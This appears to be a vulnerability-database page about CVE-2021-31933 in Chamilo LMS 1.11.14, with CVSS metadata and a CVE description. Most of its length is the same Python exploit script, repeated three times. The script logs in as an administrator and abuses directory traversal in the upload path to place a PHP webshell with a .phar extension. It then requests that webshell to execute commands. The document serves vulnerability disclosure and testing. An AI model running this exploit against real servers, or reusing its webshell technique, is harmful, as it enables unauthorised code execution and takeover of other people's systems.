Chamilo LMS 1.11.14 Remote Code Execution

2021-05-14T00:00:00

Description

{"id": "PACKETSTORM:162572", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Chamilo LMS 1.11.14 Remote Code Execution", "description": "", "published": "2021-05-14T00:00:00", "modified": "2021-05-14T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://packetstormsecurity.com/files/162572/Chamilo-LMS-1.11.14-Remote-Code-Execution.html", "reporter": "M. Cory Billington", "references": [], "cvelist": ["CVE-2021-31933"], "immutableFields": [], "lastseen": "2021-05-14T13:57:07", "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-31933"]}, {"type": "exploitdb", "idList": ["EDB-ID:49867"]}, {"type": "zdt", "idList": ["1337DAY-ID-36246"]}], "rev": 4}, "score": {"value": 6.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-31933"]}, {"type": "exploitdb", "idList": ["EDB-ID:49867"]}, {"type": "zdt", "idList": ["1337DAY-ID-36246"]}]}, "exploitation": null, "vulnersScore": 6.9}, "sourceHref": "https://packetstormsecurity.com/files/download/162572/chamilolms11114-exec.txt", "sourceData": "`# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated) \n# Date: 13/05/2021 \n# Exploit Author: M. Cory Billington (@_th3y) \n# Vendor Homepage: https://chamilo.org \n# Software Link: https://github.com/chamilo/chamilo-lms \n# Version: 1.11.14 \n# Tested on: Ubuntu 20.04.2 LTS \n# CVE: CVE-2021-31933 \n# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/ \n \nfrom requests import Session \nfrom random import choice \nfrom string import ascii_lowercase \n \nimport requests \n \n# This is all configuration stuff, \nurl = \"http://127.0.0.1/chamilo-lms/\" # URL to remote host web root \nuser_name = \"admin\" # User must be an administrator \npassword = \"admin\" \ncommand = \"id;whoami\" \n \n# Where you want to upload your webshell. Must be writable by web server user. \n# This spot isn't protectec by .htaccess \nwebshell_path = 'web/' \nwebshell_name = f\"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar\" # Just a random name for webshell file \ncontent = f\"<?php echo `{command}`; ?>\" \n \ndef main(): \n# Run a context manager with a session object to hold login session after login \nwith Session() as s: \nlogin_url = f\"{url}index.php\" \nlogin_data = { \n\"login\": user_name, \n\"password\": password \n} \nr = s.post(login_url, data=login_data) # login request \n \n# Check to see if login as admin user was successful. \nif \"admin\" not in r.url: \nprint(f\"[-] Login as {user_name} failed. Need to be admin\") \nreturn \nprint(f\"[+] Logged in as {user_name}\") \nprint(f\"[+] Cookie: {s.cookies}\") \nfile_upload_url = f\"{url}main/upload/upload.php\" \n# The 'curdirpath' is not santitized, so I traverse to the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as well \nphp_webshell_file = { \n\"curdirpath\": (None, f\"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}\"), \n\"user_upload\": (webshell_name, content) \n} \n \n## Good command if you want to see what the request looks like without sending \n# print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii')) \n \n# Two requests required to actually upload the file \nfor i in range(2): \ns.post(file_upload_url, files=php_webshell_file) \n \nexploit_request_url = f\"{url}{webshell_path}{webshell_name}\" \nprint(\"[+] Upload complete!\") \nprint(f\"[+] Webshell: {exploit_request_url}\") \n \n# This is a GET request to the new webshell to trigger code execution \ncommand_output = s.get(exploit_request_url) \nprint(\"[+] Command output:\\n\") \nprint(command_output.text) \n \n \n \nif __name__ == \"__main__\": \nmain() \n`\n", "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645899213}}

{"cve": [{"lastseen": "2022-03-23T18:14:01", "description": "A remote code execution vulnerability exists in Chamilo through 1.11.14 due to improper input sanitization of a parameter used for file uploads, and improper file-extension filtering for certain filenames (e.g., .phar or .pht). A remote authenticated administrator is able to upload a file containing arbitrary PHP code into specific directories via main/inc/lib/fileUpload.lib.php directory traversal to achieve PHP code execution.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-30T21:15:00", "type": "cve", "title": "CVE-2021-31933", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31933"], "modified": "2021-05-17T20:15:00", "cpe": ["cpe:/a:chamilo:chamilo:1.11.14"], "id": "CVE-2021-31933", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31933", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:chamilo:chamilo:1.11.14:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2021-11-08T14:24:09", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-14T00:00:00", "type": "zdt", "title": "Chamilo LMS 1.11.14 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31933"], "modified": "2021-05-14T00:00:00", "id": "1337DAY-ID-36246", "href": "https://0day.today/exploit/description/36246", "sourceData": "# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)\n# Exploit Author: M. Cory Billington (@_th3y)\n# Vendor Homepage: https://chamilo.org\n# Software Link: https://github.com/chamilo/chamilo-lms\n# Version: 1.11.14\n# Tested on: Ubuntu 20.04.2 LTS\n# CVE: CVE-2021-31933\n# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/\n\nfrom requests import Session\nfrom random import choice\nfrom string import ascii_lowercase\n\nimport requests\n\n# This is all configuration stuff, \nurl = \"http://127.0.0.1/chamilo-lms/\" # URL to remote host web root\nuser_name = \"admin\" # User must be an administrator\npassword = \"admin\"\ncommand = \"id;whoami\"\n\n# Where you want to upload your webshell. Must be writable by web server user.\n# This spot isn't protectec by .htaccess\nwebshell_path = 'web/' \nwebshell_name = f\"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar\" # Just a random name for webshell file\ncontent = f\"<?php echo `{command}`; ?>\" \n\ndef main():\n # Run a context manager with a session object to hold login session after login\n with Session() as s:\n login_url = f\"{url}index.php\"\n login_data = {\n \"login\": user_name,\n \"password\": password\n }\n r = s.post(login_url, data=login_data) # login request\n\n # Check to see if login as admin user was successful.\n if \"admin\" not in r.url:\n print(f\"[-] Login as {user_name} failed. Need to be admin\")\n return\n print(f\"[+] Logged in as {user_name}\")\n print(f\"[+] Cookie: {s.cookies}\")\n file_upload_url = f\"{url}main/upload/upload.php\"\n # The 'curdirpath' is not santitized, so I traverse to the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as well\n php_webshell_file = {\n \"curdirpath\": (None, f\"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}\"),\n \"user_upload\": (webshell_name, content)\n }\n \n ## Good command if you want to see what the request looks like without sending\n # print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))\n\n # Two requests required to actually upload the file\n for i in range(2):\n s.post(file_upload_url, files=php_webshell_file)\n\n exploit_request_url = f\"{url}{webshell_path}{webshell_name}\"\n print(\"[+] Upload complete!\")\n print(f\"[+] Webshell: {exploit_request_url}\")\n\n # This is a GET request to the new webshell to trigger code execution\n command_output = s.get(exploit_request_url)\n print(\"[+] Command output:\\n\")\n print(command_output.text)\n\n\n\nif __name__ == \"__main__\":\n main()\n", "sourceHref": "https://0day.today/exploit/36246", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-13T17:38:06", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-14T00:00:00", "type": "exploitdb", "title": "Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-31933", "CVE-2021-31933"], "modified": "2021-05-14T00:00:00", "id": "EDB-ID:49867", "href": "https://www.exploit-db.com/exploits/49867", "sourceData": "# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)\r\n# Date: 13/05/2021\r\n# Exploit Author: M. Cory Billington (@_th3y)\r\n# Vendor Homepage: https://chamilo.org\r\n# Software Link: https://github.com/chamilo/chamilo-lms\r\n# Version: 1.11.14\r\n# Tested on: Ubuntu 20.04.2 LTS\r\n# CVE: CVE-2021-31933\r\n# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/\r\n\r\nfrom requests import Session\r\nfrom random import choice\r\nfrom string import ascii_lowercase\r\n\r\nimport requests\r\n\r\n# This is all configuration stuff, \r\nurl = \"http://127.0.0.1/chamilo-lms/\" # URL to remote host web root\r\nuser_name = \"admin\" # User must be an administrator\r\npassword = \"admin\"\r\ncommand = \"id;whoami\"\r\n\r\n# Where you want to upload your webshell. Must be writable by web server user.\r\n# This spot isn't protectec by .htaccess\r\nwebshell_path = 'web/' \r\nwebshell_name = f\"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar\" # Just a random name for webshell file\r\ncontent = f\"<?php echo `{command}`; ?>\" \r\n\r\ndef main():\r\n # Run a context manager with a session object to hold login session after login\r\n with Session() as s:\r\n login_url = f\"{url}index.php\"\r\n login_data = {\r\n \"login\": user_name,\r\n \"password\": password\r\n }\r\n r = s.post(login_url, data=login_data) # login request\r\n\r\n # Check to see if login as admin user was successful.\r\n if \"admin\" not in r.url:\r\n print(f\"[-] Login as {user_name} failed. Need to be admin\")\r\n return\r\n print(f\"[+] Logged in as {user_name}\")\r\n print(f\"[+] Cookie: {s.cookies}\")\r\n file_upload_url = f\"{url}main/upload/upload.php\"\r\n # The 'curdirpath' is not santitized, so I traverse to the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as well\r\n php_webshell_file = {\r\n \"curdirpath\": (None, f\"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}\"),\r\n \"user_upload\": (webshell_name, content)\r\n }\r\n \r\n ## Good command if you want to see what the request looks like without sending\r\n # print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))\r\n\r\n # Two requests required to actually upload the file\r\n for i in range(2):\r\n s.post(file_upload_url, files=php_webshell_file)\r\n\r\n exploit_request_url = f\"{url}{webshell_path}{webshell_name}\"\r\n print(\"[+] Upload complete!\")\r\n print(f\"[+] Webshell: {exploit_request_url}\")\r\n\r\n # This is a GET request to the new webshell to trigger code execution\r\n command_output = s.get(exploit_request_url)\r\n print(\"[+] Command output:\\n\")\r\n print(command_output.text)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()", "sourceHref": "https://www.exploit-db.com/download/49867", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}

Chamilo LMS 1.11.14 Remote Code Execution

Description

Related